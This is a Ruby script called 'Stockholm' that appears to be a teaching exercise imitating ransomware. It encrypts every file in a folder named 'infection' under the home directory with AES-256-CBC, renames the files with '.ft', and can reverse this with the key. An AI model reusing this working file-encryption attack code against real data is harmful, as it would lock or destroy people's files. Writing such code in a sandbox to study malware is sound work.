#!/usr/bin/env ruby 

require 'optparse'
require 'openssl'

class Config 
  attr_accessor :silence, :key, :reverse

  def initialize(key, silence=false, reverse=false)
    @key = key 
    @silence = silence 
    @reverse = reverse 
  end 
end

def print(silence, message)
  puts "#{message}" unless silence
end

def usage(conf)
  print(conf.silence, "./stockholm [ -h help] [ -v version ] [ -s silence ] [ -k reverse key ] {KEY} ")
  exit
end

def version(conf)
  print(conf.silence, "Stockholm v0.1")
  exit
end

def options(input, config)
  if input.size > 3 || input.size < 1
    usage(config)
  end
  OptionParser.new do |opts|
  opts.on("-s", "--silence", "silence the output") do |s|
    config.silence = true
    end
    opts.on("-h", "--help", "display help") do |h|
      usage(config)
    end
    opts.on("-v", "--version", "display version of the program") do |v|
      version(config)
    end
    opts.on("-rKEY", "--reverse=KEY", "reverse the infection") do |key|
      config.key = key 
      config.reverse = true
    end
  end.parse!
end

def check_conf(config)
  if config.key.size < 16 
    print(false, "[STOCKHOLM] key must be at least 16 characters")
    exit()
  end
end

def check_dir(config)
  dirname = File.basename(Dir.getwd)
  if dirname != "infection"
    print(config.silence, "[STOCKHOLM] this program just can be executed in a folder called \"infection\" ")
    exit()
  end

  path = File.expand_path(File.dirname(__FILE__))
  if ENV['HOME'].nil?
    print(config.silence, "[STOCKHOLM] Home is not define")
    exit()
  end
  unless path.start_with?(ENV['HOME'])
    print(config.silence, "[STOCKHOLM] this program just can be executed in #{ENV['HOME']} ")
    exit()
  end
end

def derive_key(key)
  OpenSSL::Digest::SHA256.digest(key)
end

def encrypt(file, password, silence)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt

  key = derive_key(password)
  cipher.key = key
  iv = cipher.random_iv

  data = File.binread(file)
  if data.empty? || data.size < 16
    print(silence, "file: #{file} empty or too small skiping")
    return
  end
  encrypted = cipher.update(data) + cipher.final

  File.binwrite(file, iv + encrypted)

  File.rename(file, file + ".ft") unless file.end_with?(".ft")

  print(silence, "- #{file}")
end

def decrypt(file, password, silence)
  data = File.binread(file)
  if data.empty? || data.size < 16
    print(silence, "file: #{file} empty or too small skiping")
    return
  end
  iv = data[0,16]
  encrypted = data[16..]

  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt

  key = derive_key(password)
  cipher.key = key
  cipher.iv = iv
  begin
    decrypted = cipher.update(encrypted) + cipher.final
    File.binwrite(file, decrypted)
    new_name = file.sub(/\.ft$/, '')
    File.rename(file, new_name)
  rescue OpenSSL::Cipher::CipherError => e
    print(silence, "Could not decrypt #{file}: #{e.message}")
    return 
  end
  print(silence, "- #{file}")
end

def init_attack(config)
  print(config.silence, "[STOCKHOLM] Encrypting files:")
  Dir.glob('*').each do |file|
    next if file == "stockholm"
    next if File.extname(file) == ".ft"
    encrypt(file, config.key, config.silence)
  end
end

def reverse_attack(config)
  print(config.silence, "[STOCKHOLM] Decrypting files:")
  Dir.glob('*').each do |file|
    next if file == "stockholm"
    next if File.extname(file) != ".ft"
    decrypt(file, config.key, config.silence)
  end
end

def main()
  input = ARGV
  key = ARGV[-1]
  conf = Config.new(key)
  options(input, conf) 
  check_conf(conf)
  check_dir(conf)
  if !conf.reverse
    init_attack(conf)
  else
    reverse_attack(conf)  
  end
end

if __FILE__ == $0
    main
end
